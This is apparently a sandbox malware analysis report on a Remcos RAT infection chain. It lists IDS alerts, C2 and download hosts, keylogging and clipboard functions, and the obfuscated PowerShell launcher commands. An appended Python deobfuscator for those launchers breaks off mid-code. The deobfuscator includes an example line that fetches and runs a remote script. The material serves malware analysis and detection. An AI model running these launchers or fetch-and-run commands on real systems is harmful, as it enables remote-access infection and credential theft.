Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                    Phishing

                    barindex
                    Source: Yara matchFile source: clearentirethingwithbestnoticetheeverythinggooodfrome.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1797357428.0000000006F65000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.pdb source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 192.3.122.159:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49740 -> 107.173.143.31:14646
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 107.173.143.31:14646
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.4:49738
                    Source: Malware configuration extractorURLs: kelexrmcadmnnccupdated.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: kelexrmcadmnnccupdated.duckdns.org
                    Source: Yara matchFile source: 7.2.powershell.exe.6347ae0.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 107.173.143.31:14646
                    Source: global trafficHTTP traffic detected: GET /r/pBbD1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 172.67.187.200:443
                    Source: global trafficHTTP traffic detected: GET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_046B7A18 URLDownloadToFileW,3_2_046B7A18
                    Source: global trafficHTTP traffic detected: GET /r/pBbD1/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: CasPol.exe, 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: kelexrmcadmnnccupdated.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simpleg
                    Source: powershell.exe, 00000003.00000002.1797663819.0000000006FD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1797357428.0000000006F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF
                    Source: powershell.exe, 00000003.00000002.1799959412.0000000007DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIFLMEM
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: CasPol.exe, CasPol.exe, 0000000C.00000002.4133634036.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpUJ
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.h
                    Source: CasPol.exe, 0000000D.00000002.2090602025.00000000012F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: CasPol.exe, 0000000D.00000002.2095682237.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: CasPol.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    E-Banking Fraud

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BB81 SystemParametersInfoW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BB87 SystemParametersInfoW

                    System Summary

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
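The two launcher command lines above are the same trick in two spellings: a base64 blob is handed to FromBase64String, the result is passed to Invoke-Expression, and in the cmd.exe variant the very names of those calls are hidden behind 'literal'+[char]58+... concatenation and random keyword casing (the "PowerShell case anomaly" signature). A triage analyst does not need to run PowerShell to get at the next stage. The Python below is an added example, not part of the Joe Sandbox report: it folds the concatenation chains statically, inlines $variable = '...' assignments so the wscript.exe variant resolves too, peels nested FromBase64String layers, and flags the case anomaly. The two-layer sample is constructed here from a placeholder final stage (example.invalid), because the report does not reproduce the real base64 payloads.

```python
import base64
import re

# Constructed two-layer sample modelled on the two launcher command lines in this report
# (the char-concatenation form and the $variable form). The real base64 blobs are not
# reproduced on the page, so both layers are built here from a placeholder final stage.
FINAL_STAGE = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


LAYER2 = (
    "$capellmeister = '" + _b64(FINAL_STAGE) + "';"
    "$hypoxanthine = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine"
)
LAYER1 = (
    "PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; "
    "InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A"
    "+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'"
    + _b64(LAYER2) + "'+[ChAR]0X22+'))')))"
)

# One piece of a concatenation: a single-quoted literal ('' escapes a quote) or a [char]N cast.
_PIECE = r"(?:'(?:[^']|'')*'|\[char\]\s*(?:0x[0-9a-f]+|\d+))"
_RUN = re.compile(_PIECE + r"(?:\s*\+\s*" + _PIECE + r")*", re.I)
_ONE = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
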